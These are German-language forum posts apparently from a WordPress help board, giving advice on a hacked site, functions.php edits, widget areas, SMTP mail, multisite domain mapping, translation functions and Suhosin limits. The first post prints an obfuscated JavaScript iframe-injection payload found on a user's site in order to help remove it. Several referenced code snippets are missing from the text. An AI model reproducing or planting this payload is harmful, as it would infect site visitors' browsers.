Beiträge von codestyling

    Dein WordPress hat einen inline IFRAME Hack, der Code in der Seite ist der:

    Code
    try{window.document.body++}catch(gdsgsdg){dbshre=89;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,114,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,114,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,109,97,90,94,96,99,91,90,103,107,102,38,92,105,104,38,50,40,93,106,108,102,109,95,109,37,104,97,106,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,113,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,114,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,113,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-450!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}


    Aufgelöst sieht das dann so aus:


    Es befindet sich zwischen dem

    Code
    <[COLOR=#ff0000][B]body [/B][/COLOR]class="home page page-id-13 page-template page-template-onecolumn-page-php custom-background">

    und direkt vor

    Code
    <[COLOR=#ff0000][B]div [/B][/COLOR]id="wrapper" class="hfeed">


    wenn man die Hauptseite betrachtet.
    Ich würde nach dem [COLOR=#ff0000]body [/COLOR]tag in den Templates suchen und nach dem [COLOR=#ff0000]div[/COLOR]. Dazwischen müsste der Mist kleben. Wenn nicht, wird das ganze per Hook reingeklebt, dann müßte man untersuchen, wer das macht (Theme oder Plugin).

    Deine functions.php endet so:

    Wenn du das nach dem schliessenden PHP Tag einfügst wird es als textualer Seitenbestandteil ausgegeben statt ausgeführt zu werden.

    Das Ende deiner functions.php sollte so aussehen:

    Hast du mal in der von dir verlinkten Seite unter "Datenbanken & Scripte" nachgesehen?
    Dort schreibt der Provider selbst, das sich XXL nicht für Joomla, Drupal und WordPress eignet. Man sollte sich das vorher durchlesen, bevor man einen Tarif abschließt. Wenn es nicht ein finanzielles Problem ist, würde ich das Packet upgraden lassen und es vorher mit dem Support klären, was in Frage kommt.

    Eine alte WP Version einzusetzen, erhöht dramatisch die Anfälligkeit des Blogs für Hacking Versuche, das würde ich bleiben lassen. Und das Limit erreichst du früher oder später auch mit der alten Version, spätestens wenn die Artikelanzahl wächst oder doch noch Plugins dazu kommen.

    Ich kann kein Problem feststellen, habe das mit Twenty Twelfe erstellt.
    Der erste Schnipsel kommt in die functions.php deines Themes, der 2. Schnipsel war das, was du eingangs gepostet hast nur mit einer Zeile erweitert, die die zusätzlich Widget Area ausgibt.

    Der erste Schnipsel war mit der Formatierung natürlich an Twenty Twelfe orientiert. Laut deinem Screenshot für deine aus dem Theme kommende Sidebar gibt es aber eine abweichende Formatierung. Der erste (zusätzliche) Schnispel sieht angepasst auf dein Theme so aus:

    Änderungen macht man auf den heimischen Rechner, zieht per FTP eine Kopie der betreffenden Datei, bearbeitet diese und lädt die mit FTP wieder hoch. Wenn man was kaputt gespielt hat, dann lädt man einfach das Original wieder hoch.

    Da ich davon ausgehe, das du das Original Theme noch rumliegen hast, lade einfach die bearbeiteten Dateien aus dem Original wieder hoch.

    Wie wäre es, wenn die eine weiter Widget Area vor das Menü zusätzlich einbaust und die beiden Widgets da reinziehst?

    Das kommt dann zusätzlich in deine functions.php deines Themes rein:

    Hier wird die spezielle Widget Area zusätzlich davor aufgerufen und ausgegeben, sofern sie was enthält.

    In der Widget Verwaltung solltest du nun eine neue Area für Drag / Drop haben mit der Beschriftung "Special Sidebar". Dorthinein verschiebst du die gewünschten Widgets und fertig.

    Warum deaktiviert dein Provider die mail() Funktion?
    Mit WP wäre es einfach, den From zu wechseln.

    Mit SMTP Plugins ist man da nicht so einfach raus. Dieses hier: http://wordpress.org/extend/plugins…tp/screenshots/ kann nur einen Absender hart einstellen. Für die Logindaten ist das ja ok. Aber der From muß ggf. ja umgeändert werden können. Ich hab das Plugin noch nicjt angesehen, aber wenn es habwegs vernünftig programmiert ist, könnte man den From in einem Filter je nach Bedarf umbiegen.

    Ohne Änderungen wird das aber nicht gehen, denn SMTP ist immer ein Notbehelf. Ich würde den Provider ernsthaft fragen, was der Grund für die Deaktivierung ist und ob man die nicht aufheben kann.

    Die Frage ist, wie die Adressen von 3 Beispielnutzer aussehen sollen.

    Fall 1.) alle von deinem Blog:
    1.) xx@myblog.de
    2.) yy@myblog.de
    3.) zz@myblog.de

    oder Fall 2.) echte Adressen mit unterschiedlichen Mailern:
    1.) xx@myblog.de
    2.) yy@web.de
    3.) zz@gmx.net

    Im Fall 1.) bekommt man das hin, indem du die Adressen zu deiner Domain einrichtest und einem SMTP Plugin beibringst, den FROM zum eingeloggten Nutzer anzupassen. (ggf. kleiner Patch)

    Im Fall 2.) mußt du selbst ran, denn dann muß die Nutzer Profilseite um die SMTP Angaben zur Nutzer-Email Adresse erweitert werden und dort braucht es dann ggf. sogar ein Password Feld zum Versenden. So ein Plugin kenne ich nicht.

    Welche Upload-Geschwindigkeit und Script-Runtime hast du zu dem (auf dem) Server?
    PHP hat eine limitierte Scriptlaufzeit, je nach Konfiguration zwischen 10s, 30s bzw. max 60s.
    Wenn das File nicht innerhalb dieser Zeit hochgeladen werden kann, wird PHP abgebrochen.

    DomainMapping kann subdomains oder subpfad blogs auf eine neue Domain mappen, nicht mehr und nicht weniger.

    Beispiel:

    Hauptblog xy.com -> nach wie vor xy.com
    Sub1 sub1.xy.com -> gemapped auf autohaus.com
    Sub2 sub2.xy.com -> gemapped auf gebrauchtwagen.com

    Im Hauptblog kann man nun eigene Loops schreiben, die je nach Kategorie im Hauptblog anhand der Kategorie den Subblog auswählen, switch_to_blog() aufrufen, den Query starten, das Ergebnis ausgeben und wieder mit switch_to_blog() zurückschalten. Der Content enthält dann Links, die auf die Subdomain (samt Mapping URL) verweisen.

    Falls ich was falsch verstanden hab, klär micht bitte auf. Kategorien jedenfalls kann man nicht "umleiten".

    Das sind falsche Übersetzungsfunktionen. Ändere diese mal ab, Beispiel:

    falsch:

    Code
    [COLOR=#000000][COLOR=#DD0000]'frontendICO' [/COLOR][COLOR=#007700]=> [/COLOR][COLOR=#0000BB]_[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'ICO'[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]AIOFAVICON_TEXTDOMAIN[/COLOR][COLOR=#007700]),[/COLOR][/COLOR]

    richtig:

    Code
    [COLOR=#000000][COLOR=#DD0000]'frontendICO' [/COLOR][COLOR=#007700]=> [/COLOR][COLOR=#0000BB]__[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'ICO'[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]AIOFAVICON_TEXTDOMAIN[/COLOR][COLOR=#007700]),[/COLOR][/COLOR]

    Das müssen 2 Unterstriche als Funktion sein!

    Und danach informierst du den Autor über seine Fehler :-)

    Das liegt an der Suhosin Erweiterung für PHP, die die Anzahl und Länge von Parametern beschränken kann:

    Zitat
    • Allows enforcing limits on REQUEST variables or separated by type (GET, POST, COOKIE)

      • Supports a number of variables per request limit
      • Supports a maximum length of variable names [with and without indicies]
      • Supports a maximum length of array indicies
      • Supports a maximum length of variable values
      • Supports a maximum depth of arrays



    http://www.hardened-php.net/suhosin/a_feature_list.html

    Dies hat vermutlich dein Provider restriktiv konfiguriert und damit gibt es dann in Menüs Probleme, denn für jeden einzelnen Menüpunkt werden 3 Parameter gesendet. WordPress kann per se unendlich große Menüs, nur wird das leider durch Erweiterungen wie o.g. verhindert.
    Ändern kann das nur dein Provider. Sehen kannst du das, wenn du die PHP Info aufrufst. Dort steht sehr prominent drin, dass Suhosin läuft.

    Warum Kategorien mappen?
    Wenn du Multisite installierts und mehrere Domains hast, dann ist doch schon die Kategorie=SubDomain.
    Und wenn du Beiträge auf dem Zentralblog mischen willst, dazu kann man per WordPress Funktion den Blog kurzfristig switchen, einen Query starten und die Ergebnisse darstellen und wieder zurückschalten.

    Im Screenshot sind noch jede Menge Plugins aktiv und das Theme ist auch nicht Standard.
    Wie schon vorgeschlagen, testet man das, indem man alle Plugins deaktiviert und auf das Theme "Twenty Twelfe" bei WP 3.5 umstellt. Wenn es dann funktioniert, liegt es entweder am anderen Theme oder einem der Plugins.
    Wenn es dort auch nicht geht, dann ist es entweder das Memory Limit, fehlende GD Bibliothek, falsches Upload Dir oder falsche Benutzerrechte im Dateisystem.